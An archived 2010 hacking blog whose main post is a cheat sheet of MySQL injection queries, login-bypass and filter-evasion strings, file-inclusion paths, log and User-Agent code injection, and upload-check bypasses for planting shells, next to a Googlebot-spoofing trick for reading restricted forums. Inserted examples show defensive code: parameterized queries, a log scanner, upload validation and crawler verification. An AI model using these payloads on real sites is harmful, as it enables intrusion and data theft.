
Sunday 26 December 2010

Web Hacking for Beginners and Intermediates

This is the article I posted for the secworm contest, and I am now posting it on my blog. It's not that well written due to lack of time, but it should still help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207, and this is my article, my entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article, as there will surely be lots of them.

This article is not about teaching the basics of any web hacking technique. Instead, it is a document of tips and tricks that beginners and intermediates can make use of in order to attack web applications in certain scenarios. I assume that you know the basics of web hacking techniques, or you can google to learn the basics. I'll be covering tricks for different web hacking methods such as SQL injection (MySQL basically), insecure file inclusion, insecure file upload, etc. As already stated, the article won't be about the basics but rather presents a few useful tricks that might help in the course of web-app pentesting.

SQL Injection:
Comments: -- , /* , #
MySQL version: SELECT @@version

Current SQL user: SELECT user()
SELECT system_user()

Current database: SELECT database()

MySQL data directory (location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 -- hex encoding of the string
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') -- quote bypassing can be used here too.

Create a file with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
Quote bypassing does not work here: the path can't be encoded with hex or char(), so the quotes can't be avoided in this case.

Using LIMIT: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is displayed while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) -- bypassing a whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both the username and password fields
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
Any of these in the username field with a random password bypasses a vulnerable authentication check.

' /*or*/ 1='1 -- bypasses an "or" filter
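To see why the login-bypass strings above work, and what actually stops them, here is an added example (mine, not part of the original article) that runs the same string-concatenation pattern against an in-memory SQLite database standing in for MySQL, next to the parameterized query that fixes it. The users table, the one account in it, and the payload `' or 1=1--` (the same pattern as the strings above, written so that it also evaluates as true under SQLite's stricter type comparison) are all constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory database: one sample account, not real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('samar', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """Builds the query by string concatenation, so the input becomes SQL.

    With user = ' or 1=1-- the WHERE clause turns into
        user='' or 1=1--' AND pass='...'
    and everything after -- is a comment, so the password check vanishes.
    """
    query = ("SELECT COUNT(*) FROM users "
             f"WHERE user='{user}' AND pass='{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_parameterized(conn, user, password):
    """Uses bound parameters: the driver treats input as data, never as SQL."""
    query = "SELECT COUNT(*) FROM users WHERE user=? AND pass=?"
    return conn.execute(query, (user, password)).fetchone()[0] > 0


def demo():
    """Run both variants with valid credentials and with the bypass string."""
    conn = make_db()
    bypass = "' or 1=1--"   # same pattern as the login-bypass strings above
    return {
        "valid_vulnerable": login_vulnerable(conn, "samar", "s3cret"),
        "valid_parameterized": login_parameterized(conn, "samar", "s3cret"),
        "bypass_vulnerable": login_vulnerable(conn, bypass, "anything"),
        "bypass_parameterized": login_parameterized(conn, bypass, "anything"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The comment-stripping trick (`--`, `/*`, `#`) only matters when the input is spliced into the query text; with placeholders the driver sends the literal string `' or 1=1--` as the username value and the lookup simply fails. Case-mangled keywords, `/*!union*/` and whitespace substitutes are all attempts to get past a keyword filter on concatenated input, which is why filtering is a weak substitute for parameterization.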


File Inclusion:
A sample vulnerable piece of code (test.php) would look something like the following:


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. You should also try including everything you can, such as session files, uploaded files, etc. For Apache log injection, you'll have to telnet to the server and send a GET request containing arbitrary PHP code, like GET / . A few Apache log locations to try are listed below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your User-Agent to some PHP code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
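From the defender's side, every inclusion trick above leaves a recognizable trace in the web server's access log. The following is an added example (mine, not from the article) of a small log scanner in Python: it parses constructed Apache combined-format lines, URL-decodes the request line and the User-Agent twice, and flags path traversal, null bytes, PHP stream wrappers, /proc/self/environ and PHP open tags. The log lines, timestamps and IP addresses are made up for this example.

```python
import re
from urllib.parse import unquote

# Indicators drawn from the inclusion tricks described in the article.
INDICATORS = [
    ("path traversal", re.compile(r"\.\.[/\\]")),
    ("null byte", re.compile("\x00")),
    ("php wrapper", re.compile(r"(?:php|data|expect)://", re.I)),
    ("proc environ", re.compile(r"/proc/self/environ", re.I)),
    ("php open tag", re.compile(r"<\?php", re.I)),
]

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def inspect_line(line):
    """Return (client_ip, [findings]) for a parsable line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    for field in ("request", "agent"):
        # Decode twice so %2e%2e%2f and double-encoded %252e.. forms are both caught.
        value = unquote(unquote(m.group(field)))
        for name, pattern in INDICATORS:
            if pattern.search(value):
                findings.append(f"{name} in {field}")
    return m.group("ip"), findings


def scan(lines):
    """Return [(ip, findings)] for every line with at least one indicator."""
    results = []
    for line in lines:
        parsed = inspect_line(line)
        if parsed is not None and parsed[1]:
            results.append(parsed)
    return results


# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [26/Dec/2010:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [26/Dec/2010:10:00:01 +0000] "GET /test.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [26/Dec/2010:10:00:02 +0000] "GET /test.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.13 - - [26/Dec/2010:10:00:03 +0000] "GET /test.php?page=../../../proc/self/environ HTTP/1.1" 200 300 "-" "<?php echo 1; ?>"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

Two things worth noting when running this on real logs: the User-Agent is scanned as well as the request line, because the /proc/self/environ and log-injection variants put the payload there rather than in the URL, and a 200 status on a flagged line is the signal to look at, since a successful include returns normally. On the application side the fix is not a filter but an allow-list: map the page parameter to a fixed set of files and refuse anything else.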

File upload:
Nullbyte injection: If only valid extensions (such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg, which will bypass the file upload security check.

PHP code within an image: Sometimes uploads are not checked for the file extension but for the dimensions of the image. This again can be bypassed by injecting PHP code into a valid image and renaming it to a .php file. The tool named edjpgcom can be used to inject the PHP code as a JPEG comment in the image.

Header bypass: Again, sometimes the developer just relies on the header information that contains the type of the file, like "image/jpeg" for a JPEG image. But since this is passed from the client side, it can be modified using tools such as Tamper Data or Live HTTP Headers.

Also, the file upload feature can be exploited in combination with a file inclusion vulnerability. If a site is vulnerable to file inclusion but not to insecure file upload, you can upload a valid image as described in the second method above and then include that file with the file inclusion vulnerable PHP script.
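An added example (mine, not the article's) of server-side upload handling that closes the three bypasses above: null bytes in the filename are rejected, only the last extension counts and it must be allow-listed, the client-supplied Content-Type is recorded but never trusted and the file signature (magic bytes) is checked instead, image bodies containing a PHP open tag are refused, and the file is stored under a server-generated name so the original name never reaches disk. The allow-list and signature table are my choices and `validate_upload` is a hypothetical function name.

```python
import os
import uuid

# Allowed extensions and the signature each file body must start with.
# The table is my choice for this example; extend it as the application needs.
SIGNATURES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",          # covers both GIF87a and GIF89a
}


def validate_upload(filename, declared_type, data):
    """Hypothetical upload check. Returns (accepted, reason, stored_name)."""
    # 1. A null byte anywhere in the name (the shell.php%00.jpg style) is rejected.
    if "\x00" in filename:
        return False, "null byte in filename", None

    # 2. Only the LAST extension counts, lower-cased, and it must be allow-listed;
    #    shell.php is refused, shell.php.jpg is treated as a jpg and renamed below.
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    if ext not in SIGNATURES:
        return False, f"extension {ext!r} not allowed", None

    # 3. The Content-Type header is client-controlled, so it only appears in the
    #    reason string; the file signature decides whether the body is an image.
    if not data.startswith(SIGNATURES[ext]):
        return False, f"body does not match {ext} signature (client said {declared_type})", None

    # 4. Defence in depth against PHP tags smuggled into image comments.
    if b"<?php" in data or b"<?=" in data:
        return False, "PHP open tag inside image data", None

    # 5. Store under a server-generated name with the validated extension.
    return True, "ok", f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"   # constructed JPEG header bytes
    for name, ctype, body in [
        ("shell.php\x00.jpg", "image/jpeg", jpeg),
        ("shell.php", "image/jpeg", jpeg),
        ("photo.jpg", "image/jpeg", b"<?php echo 1; ?>"),
        ("photo.jpg", "image/jpeg", jpeg + b"<?php echo 1; ?>"),
        ("shell.php.jpg", "text/plain", jpeg),
    ]:
        print(repr(name), "->", validate_upload(name, ctype, body))
```

The renaming step is what makes the image-with-PHP-comment trick harmless even if the tag check were missing: a body that is really a JPEG is written as `<random>.jpg`, and the upload directory should in any case be configured so the web server never executes scripts from it. Pairing that with the file-inclusion allow-list above removes the upload-plus-include combination described in the paragraph before this one.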

As said earlier, this article is not about giving you every step of how to exploit web vulnerabilities.




Friday 24 December 2010

Browsing the restricted forums without registering

Well, it has worked for me, and I am posting how you can browse restricted forums by misusing SEO (I guess). A website's traffic depends hugely on Google search, and hence most websites allow the Google bot to crawl and index their pages so that they appear in the search results. The Googlebot user agent is therefore allowed to crawl even restricted forums, and so those pages can be indexed.

The requirement is the User Agent Switcher add-on for Firefox, which can be downloaded from HERE. Install this add-on and restart Firefox.

Now in the Firefox menu, under Tools, you will see a new option, Default User Agent, from where you can choose different user agents and add new ones. Among the available user agents, you will find the Google Bot 2.1 user agent under the Search Robots option. Choose Google Bot 2.1 as your default user agent and start visiting the forums that were asking you to register. It will also work on other types of websites that usually require a login. I hope this helps you. Thanks :)
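The trick only works because the forum trusts the User-Agent string by itself. The added example below (mine, not from the post) shows how a site can tell a real crawler from a borrowed user agent: reverse-resolve the client IP, require the hostname to end in googlebot.com or google.com, then forward-resolve that hostname and require it to contain the same IP, which is the verification procedure Google documents for its crawlers. The DNS records here are a constructed lookup table so the example runs offline; the hostnames and addresses are invented.

```python
import ipaddress

# Constructed DNS records (documentation-range addresses, invented hostnames)
# so the example runs without network access.
PTR_RECORDS = {
    "192.0.2.66": "crawl-192-0-2-66.googlebot.com",
    "203.0.113.7": "vps-7.example.net",
    "198.51.100.9": "crawl-198-51-100-9.googlebot.com.evil.example",
}
A_RECORDS = {
    "crawl-192-0-2-66.googlebot.com": ["192.0.2.66"],
    "vps-7.example.net": ["203.0.113.7"],
    "crawl-198-51-100-9.googlebot.com.evil.example": ["198.51.100.9"],
}

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def is_verified_googlebot(ip, reverse_lookup, forward_lookup):
    """Reverse DNS, domain-suffix check, then forward DNS must map back to the IP."""
    ipaddress.ip_address(ip)  # reject garbage before it reaches a resolver
    hostname = reverse_lookup(ip)
    if not hostname:
        return False
    hostname = hostname.rstrip(".").lower()
    # endswith on the whole name: a substring check would accept the
    # "googlebot.com.evil.example" record above.
    if not hostname.endswith(GOOGLE_SUFFIXES):
        return False
    return ip in forward_lookup(hostname)


def classify_client(ip, user_agent,
                    reverse_lookup=PTR_RECORDS.get,
                    forward_lookup=lambda host: A_RECORDS.get(host, [])):
    """Label a request; only a DNS-verified crawler should get crawler treatment."""
    if "googlebot" not in user_agent.lower():
        return "regular client"
    if is_verified_googlebot(ip, reverse_lookup, forward_lookup):
        return "verified Googlebot"
    return "spoofed Googlebot user agent"


if __name__ == "__main__":
    ua = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    for ip in ("192.0.2.66", "203.0.113.7", "198.51.100.9"):
        print(ip, "->", classify_client(ip, ua))
    print("203.0.113.7 ->", classify_client("203.0.113.7", "Mozilla/5.0"))
```

Against a live resolver the two lookups are `socket.gethostbyaddr(ip)[0]` and `socket.gethostbyname_ex(host)[2]`, passed in place of the table lookups. Cache the result per IP, because doing both lookups on every request is slow. The simpler fix, of course, is not to show crawlers anything that logged-in users would not also be allowed to see without authentication.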


Sunday 21 November 2010

Nude.js - Nudity detection with javascript and HTMLCanvas

Today I came across an interesting page on nudity detection with JavaScript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client-side nudity detection in child filters and other social media platforms.

nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).

You can download nude.js from HERE.

For the demo, visit this page.


Saturday 9 October 2010

Searching flash games using Google Search trick

Another Google trick: this can be used to search for any flash game (swf file) you want to play.

So you just played a flash game that was really cool and you want to download it to your computer? You can use a Google search trick to find any flash game you want.
This trick relies on the way directory listing works on web servers. Whenever a default index page is missing and directory listing has not been disabled on the web server, we can view the files in the directory. I'm not going into further detail on this; instead I'm going to show you how to perform the Google search to find whatever flash game you want.

I need the game called gravity which is very fun to play. Now I do the search as below to find it:

"index of /" "last modified" "parent directory" swf gravity

You can replace the gravity with the name of the flash game you want to search and download.

Have fun with this google trick. :)


Searching PDFs and DOCs using Google Search

Generally, we use Google search to find any information we need, and Google is widely used by many of us to find information relevant to us. Sometimes we may need to find PDF (Portable Document Format) or DOC files, and even PPT (PowerPoint presentations). This can be easily done using a Google search trick.

In order to find any type of file in Google, we can use the special Google keyword filetype to specify the type of file we want to search for. Put a colon : after filetype and specify the type of file you want. For example, if you are searching for PDFs or DOCs, do the following:

filetype:pdf

filetype:doc

For example, you are searching for the PDFs related to nepali morphological analyzer, you'll do:

nepali morphological analyzer filetype:pdf

You can follow the same process for any other filetypes. Have fun with this google trick. :)


Sunday 3 October 2010

Download the full website [Complete Offline Mirroring]

This post will show you how to download a full website and have a complete offline mirror of any website you want.

wget


wget is the Linux terminal command that can be used as a non-interactive network retriever. This tool can download a full website using the -r switch for recursive download.
The command for complete mirroring is as follows:

wget -r -p http://www.techgaun.blogspot.com

or

wget -mr http://www.techgaun.blogspot.com

If you want to mirror without following links to other sites, you can enter the command as:

wget -mrnp http://www.techgaun.blogspot.com

If you are on Windows, you can use wget for Windows from HERE.

Using other tools


There are several tools available for making offline copies of any website.
One of them is the HTTrack website copier, which is licensed under the GPL. You can download this software from HERE.

Another such tool is BlackWidow, which can be used to scan a site and create a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types, such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI and HTM to MIME types, from any web site. You can download this software from HERE.

Have fun.. :)


Saturday 2 October 2010

Collection of the internet Lang/slang words

This page lists many of the acronyms used in the digital world. Originally taken from some other site, and full credit to that site.

0-9
1337 (written in ASCII) - From the word Leet, derived from the word elite
2 - too, or to
4 - For

A
AFAICR/S/T - As far as I can recall / remember / see / tell
AFAIK - As far as I know
AFK - Away from keyboard
ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.
ASAP - As soon as possible
ASL - Age / sex / location
ATEOTD - At The End of the Day
ATM - At the moment
AWOL - Absent Without (Official) Leave
AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B
B2B - Business to Business
B& and/or B7- Banned
BBIAB - Be back in a bit
BBL/S - Be back later / shortly / soon
BCNU - Be seein' you
Blog - Also known as web log or an online journal
BOFH - ~censored~ operator from hell
Bot - Any type of automated software in chatrooms and web-cataloging software
BRB - Be right back
BSOD - Blue Screen of Death
BTDT - Been there done that
BTW - By the way
Bump - Increment (for example, C's ++ operator) or a backronym for "Bring Up My Post"

C
Crawl - To retrieve a web page along with the hyperlinks that reference it
Crapplet - A poorly written computer application
CU - See you (later)
CYA - See ya OR Cover Your Ass
Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer
Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes 'jacked into'

D
DFTT - Don't feed the trolls
DGAF - Don't Give A ~censored~
DIAF - Die in a fire
DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / ~love~
DND - Do not disturb
DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E
EOF - End Of File
EOM - End of Message
EOL - End of Life. Device or hardware that is at the end of its product life cycle.
EQ - EverQuest
ETA - Estimated time of arrival

F
FAQ - Frequently Asked Question(s)
FFS - For ~censored~'s sake
Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as, an Internet troll
FMCDH - From My Cold Dead Hands
FOAD - ~censored~ off and die
FOAF - Friend of a friend
FTL - For the loss
FTW - For the win
FU - ~censored~ you
FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced "foo-bar")
FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)
FWIW - For what it's worth
FYI - For your information

G
GBTW - Get back to work
GF - Great/good fight/girlfriend
GFU - Good for you
GFY - Go ~censored~ yourself
GG - Good game, used at or near the conclusion of a gaming match
GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill
GMTA - Great minds think alike
Godwin's Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler
Gratz - Congratulations
GTFO - Get the ~censored~ out
GTG or G2G - 'Got to go' or 'Good to go'
GR - Good Race
GR8 - Great

H
HAND - Have A Nice Day
Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)
HF - Have fun
Haxor or H4x0r (1337) - Hacker
Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.
Home page - The website's introduction page, starting point, and guide. The technical term is "index"
Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.
HTH - Hope this / that helps
H8 - Hate

I
IANAL - I am not a lawyer
IBTL - In before the lock
IDC - I don't care
IDK - I don't know
IIRC - If I recall / remember correctly
IIUC - If I understand correctly
IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion
Information superhighway - The Internet (AKA: I-way, infobahn)
IONO - I don't know
IOW - In other words
IRC - Internet Relay Chat
IRL - In real life
ITYM - I Think You Mean
IWSN - I want sex now
IYKWIM - If you know what I mean

J
Jaggy - Aliased computer graphics
JK or j/k - Just kidding, or joke
JFGI - Just ~censored~/Freaking Google It

K
k or kk - OK
KISS - Keep it simple stupid.
KS(ing) - Kill-Steal(ing)
KOS - Kill on sight
KTHX - OK, thanks
KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L
L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine
L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.
Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy
Lamer - A know-nothing, one who is lame.
Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite
LFG - Looking for group
LFM - Looking for more
LM(F)AO - Laughing my (frigging) ass off
LMIRL - Let's meet in real life.
LMK - Let me know
LOL - Laughing out loud, laugh out loud
LTNS - Long time no see
Lurker - Someone who frequents a Usenet group without participating in discussions

M
MMORPG, MMO - Massive Multi-player Online Role Playing Game
MMOFPS - Massive Multi-player Online First Person Shooter
MOTD - Message of the day
MS - MapleStory, an MMORPG
MTFBWY - May The Force be with you
MUD - Multi-User Dungeon
MUSH - Multi-User Shared Hallucination
MYOB - Mind your own business
M8 - Mate

N
NE1 - "Anyone"
NFI - "No ~censored~ Idea"
Newbie, noob, or n00b - An inexperienced user of a system or game, or an annoying person.
NIFOC - Naked In Front Of Computer
NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.
NP - No problem
NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.
NVM, NVMD, or nm - Nevermind, not much

O
O RLY - Oh really?
OIC - Oh, I see
OFN - Old ~censored~ news
OMG - Oh my god
OMFG - Oh my ~censored~ god
OMW - On my way or Oh my word
OP - Original poster / Operator / Outpost
OS - Operating system
OT - Off topic
OTOH - On the other hand
OTP - On the phone or One true pairing

P
P2P - Peer to peer, or pay to play
PAW - Parents are watching
PEBKAC/PEBCAK - Problem exists between keyboard and chair
Ping - From the popular network monitoring tool, used as a greeting similar to "Are you there?".
PITA - Pain in the arse / ass
PLMK - Please let me know
PMSL - Pissing myself laughing
POS - Piece of ~love~, or parent over shoulder.
POTS - Plain old telephone service
POV - Point of view
PPL - People
PTKFGS - Punch the Keys For God's Sake
pr0n - Intentional misspelling of porn
PW - Persistent World (gaming)
pwned - Intentional misspelling of owned

Q
QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message


R
Rehi (or merely re) - Hello again
RL - Real Life
RO(T)FL - Rolling on (the) floor laughing
RO(T)FLMAO - Rolling on (the) floor laughing my ass off
RO(T)FLOL - Rolling on (the) floor laughing out loud
RSN - Real soon now (used sarcastically)
RTFB - Read the ~censored~ binary (or book)
RTFS - Read the ~censored~ source
RTFM/RTM - Read the (~censored~) manual

S
SCNR - Sorry, could not resist
sk8/sk8r - skate/skater
Smiley - Another name for emoticons
SMH - Shaking my head
SNAFU - Situation normal: all (~censored~/fouled) up
Snail mail - Normal paper mail service
SOHF - Sense of humor failure
Spider - The program behind a search engine
STFU - Shut the ~censored~ up
STFW - Search the ~censored~ web

T
TANSTAAFL - There ain't no such thing as a free lunch
TBF - Time between failures
TBH - To be honest
TG - That's great
TGIF - Thank god it's Friday
TH(N)X, TNX or TX - Thanks
TIA - Thanks in advance
TINC - There Is No Cabal, a term discouraging conspiracy theories
TMI - Too much information
TOS - Terms of service
TTBOMK - To the best of my knowledge
TTFN - Ta ta for now
TTT - To the top, used in forums to bump a thread
TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)
TTYTT - To Tell You The Truth
Tweedler - One who has deep love for all computer related technology and gadgets
TWIMC - To Whom It May Concern
TY - Thank you
TYT - Take your time
TYVM - Thank you very much

U
U - You
UTFSE - Use the ~censored~ search engine

V

W
w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term "We Own the Other Team".
W/ or W/O - With or without
WB - Welcome back
W/E - Whatever
WRT - With respect / regard to
WTB - Want to buy
WTF - What the ~censored~
WTG - Way to go
WTH - What the hell
WTS - Want to sell
WTT - Want to trade
WUG - What you got?
WoW - World of Warcraft (game)
WUBU2 - What (have) you been up to?
WUU2 - What (are) you up to?
WYSIWYG - What you see is what you get
W8 - Wait
W-BB - warez-bb.org


Y
YARLY - Yeah Really
YHBT - You have been trolled
YKW - You know what?
YMMV - Your mileage may vary.
YTMND - You're The Man Now, Dog
YW - You're welcome.
YOYO - You're On Your Own.


Z
ZOMG - An intentional misspelling of the acronym shorthand for "Oh My God/Gawd" and pronounced "Zoh My God/Gawd" This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG





Wednesday 22 September 2010

EmailTrackerPro - Email tracking software for tracking the sender

eMailTrackerPro is a tool that can help you track down email senders by analyzing the email headers. This tool is a product of VisualWare Inc., which works on network assessment and connection analysis solutions.

eMailTrackerPro asks for the email header, and all the work is done by the tool. It analyzes the email header to find the route or path the email took, and hence helps to track down the sender's IP address, which can be very useful for dealing with spam emails.

In order to find the email header, open the email in your inbox; there should be some option from which you can view the header. For instance, Yahoo Mail has the option View Full Header in the Actions tab when you're viewing the email (see the screenshot below).


Now all you have to do is copy these email headers and let eMailTrackerPro analyze them and give you the IP address of the originating location.


The software will generate the report in HTML format too.

Go to eMailTrackerPro home

Have fun... :)
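What a tool like eMailTrackerPro does with those headers is walk the Received: lines. Here is an added example (mine, not part of the post and not VisualWare's code) that parses a constructed message with Python's standard email module, lists the hops from the oldest to the newest, and shows the difference between the origin a header-tracing tool reports and the origin you can actually trust. The message, hostnames and IP addresses are all made up.

```python
import email
import re

# Constructed sample message (documentation-range addresses, invented hosts).
# Received: headers are read top-down, newest first; the bottom one is the
# hop nearest the sender.
RAW_MESSAGE = (
    "Received: from mx.example.org (mx.example.org [198.51.100.20])\n"
    "\tby inbox.example.com with ESMTP id abc123\n"
    "\tfor <user@example.com>; Sun, 26 Dec 2010 10:05:00 +0000\n"
    "Received: from relay.example.net (relay.example.net [203.0.113.40])\n"
    "\tby mx.example.org with ESMTP; Sun, 26 Dec 2010 10:04:00 +0000\n"
    "Received: from [192.0.2.55] (helo=friendly-pc)\n"
    "\tby relay.example.net with SMTP; Sun, 26 Dec 2010 10:03:00 +0000\n"
    "From: sender@example.net\n"
    "To: user@example.com\n"
    "Subject: test\n"
    "\n"
    "body\n"
)

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_RE = re.compile(r"^from\s+(\S+)", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)", re.I)


def trace_received(raw):
    """Return hops oldest-first: [{'from': ..., 'ip': ..., 'by': ...}, ...]."""
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(str(value).split())  # unfold continuation lines
        frm, ip, by = FROM_RE.search(text), IP_RE.search(text), BY_RE.search(text)
        hops.append({
            "from": frm.group(1) if frm else None,
            "ip": ip.group(1) if ip else None,
            "by": by.group(1) if by else None,
        })
    hops.reverse()
    return hops


def claimed_origin(raw):
    """The oldest hop's IP: what a header-tracing tool reports as the sender."""
    for hop in trace_received(raw):
        if hop["ip"]:
            return hop["ip"]
    return None


def trusted_origin(raw, trusted_hosts):
    """Walk newest-first while the hop was added by a server we run, and return
    the connecting IP that the last trusted server recorded; older Received:
    lines were written by other parties and can be forged."""
    candidate = None
    for hop in reversed(trace_received(raw)):
        if hop["by"] not in trusted_hosts:
            break
        candidate = hop["ip"]
    return candidate


if __name__ == "__main__":
    for hop in trace_received(RAW_MESSAGE):
        print(hop)
    print("claimed origin:", claimed_origin(RAW_MESSAGE))
    print("trusted origin:", trusted_origin(RAW_MESSAGE, {"inbox.example.com"}))
```

The caveat this makes visible: the 192.0.2.55 line at the bottom was written by relay.example.net, and a spammer who controls the relay can write anything there. If your own server is inbox.example.com, the only address you know is real is 198.51.100.20, the host that connected to you. Read the report from the trusted hops downward and treat everything below the first foreign server as a claim, not a fact.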
